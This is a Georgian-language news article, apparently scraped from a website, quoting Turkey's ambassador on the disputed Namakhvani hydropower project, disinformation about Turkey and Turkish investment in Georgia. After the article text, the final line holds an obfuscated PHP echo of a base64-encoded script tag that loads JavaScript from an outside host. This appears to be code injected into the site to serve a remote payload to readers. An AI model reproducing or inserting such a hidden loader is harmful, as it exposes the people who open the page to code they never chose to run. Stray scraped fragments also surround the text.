gorgia
ავერსი jaluzi
საქართველოში თურქეთის საგანგებო და სრულუფლებიანი ელჩის, ფატმა სერენ იაზგანი „ნამახვანჰესის“ გარშემო განვითარებულ მოვლენებთან დაკავშირებით აცხადებს, რომ „აშკარაა, არსებობდა ჩავარდნა კომუნიკაციაში“. როგორც ელჩმა აღნიშნა, ყველა გადაწყვეტილება და განცხადება, რომელიც პროექტის გამჭვირვალობას ეხება, მისასალმებელია.
 
„ეს პროექტი შენდება საქართველოსთვის და ქართველებისთვის. ის ვერ აშენდება ქართველების წინააღმდეგ. ამგვარად, ყველა პროცესი, რომელიც ეხება ტენდერს, შეთანხმებას სრულად გამჭვირვალე უნდა იყოს და დარწმუნებული ვარ ასეცაა. მისასალმებელია მთავრობის მხრიდან ნდობის ასამაღლებლად მიღებული ზომები, რომელიც უწყობს ხელს დიალოგს მათთან, ვინც ზოგადად ჰესების აშენების წინააღმდეგია, განსაკუთრებით ნამახვანში. რა თქმა უნდა, არსებობს კონტრაქტი და მასთან ერთად პასუხისმგებლობა. ENKA-ს, მთავრობასა და ადამიანებს, რომლებიც პროექტს აპროტესტებენ, უნდა ჰქონდეთ ცივილიზებული დიალოგი. ამავდროულად, სასიამოვნოა, რომ კონკრეტული დეზინფორმაცია, გამიზნული პროპაგანდა და ჭორები, ჩემი ქვეყნის, თურქეთის შესახებ, რომელიც პროტესტის მონაწილეების აღელვებას ემსახურება, ნელნელა ქრება. მე მივესალმები, განხილვას და დებატებს ამ პროექტის და საქართველოს ენერგო სტრატეგიის გარშემო, რომელიც მეცნიერებასა და მონაწილეობრივ დემოკრატიას ეფუძნება. აშკარაა, არსებობდა ჩავარდნა კომუნიკაციაში. ასევე მესმის, რომ საქართველოში იყო მღელვარება პოსტ-საარჩევნო გარემოში. სამწუხაროდ, ვფიქრობ, გარკვეული ინფორმაცია და კომუნიკაციის საჭიროება თარგმანში დაიკარგა“,- აცხადებს ელჩი.
 
მისივე თქმით, უწევს თურქი ინვესტორები დაარწმუნოს, რომ საქართველოში მეგობრული გარემოა.
 
„ინვესტორები უკვე მისვამენ კითხვებს. მე ვარწმუნებ თურქ ინვესტორებს, რომ მიუხედავად დეზინფორმაციისა და პროპაგანდისა, რომელიც ძირითადად საქართველოს გარედან მომდინარეობს, აქ ძალიან მეგობრული გარემოა თურქული ბიზნესების მიმართ. პასუხისმგებლიანი, ტრანსფარენტული ბიზნესების მიმართ, რომელიც აქ ორმხრივი მომგებიანობისთვის ჩამოდიან. გულწრფელად რომ გითხრათ, მიწევს ყველას შევახსენო, რომ 2008 წლის ომის დროსაც კი თურქულ ბიზნესებს საქართველო არ დაუტოვებიათ და აქ ჩამოსვლას აგრძელებდნენ და რა თქმა უნდა, ეს გაგრძელდება, თუმცა ამას სჭირდება მუდმივი ძალისხმევა.
 
Facebook-ის გვერდების ნახვის შემდეგ, რომლებიც გიჟურ იდეებზე ლაპარაკობენ და გიჟურ სპეკულაციებს ავრცელებენ, მიწევს იმის თქმა, რომ - არა, არავინ აპირებს რიონის წყლის მოპარვას და თურქეთში წაღებას. საქართველოს ბუნებრივი სიმდიდრე ეკუთვნის საქართველოს. თურქული კომპანიები ინვესტიციებს დებენ ბალკანეთის ქვეყნებში, ცენტრალურ აზიაში. ისინი ინტერესს შეინარჩუნებენ და მე ამის ადვოკატი ვარ. მე ასევე მინდა მოვუწოდო ქართველ ინვესტორებს დაინტერესდნენ თურქეთითაც. ეს არის განვითარების გზა“,- აღნიშნა ფატმა სერენ იაზგანმა.
 
ცნობისთვის, ნამახვანის კასკადის პროექტი გულისხმობს ორი დამოუკიდებელი ჰესის მშენებლობას რიონის ხეობაში და მისი საინვესტიციო ღირებულება 800 მილიონ აშშ დოლარამდეა. პროექტს თურქული კომპანია ENKA ახორციელებს. ჰესის წინააღმდეგ პროტესტის შემდეგ, პრემიერ-მინისტრის დავალებით, "ნამახვანჰესთან" დაკავშირებით კომპანია ENKA-სთან დადებული ხელშეკრულების შესწავლა დაევალა იუსტიციის სამინისტროს. ამასთან, კაშხლის მშენებლობაზე გამოცხადდა მორატორიუმი 9-12 თვის ვადით, ვიდრე არ მოხდება გარემოსდაცვითი, გეოლოგიური და სეისმოლოგიური კვლევების რევიზია და ხელახალი დასაბუთება.
2413
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");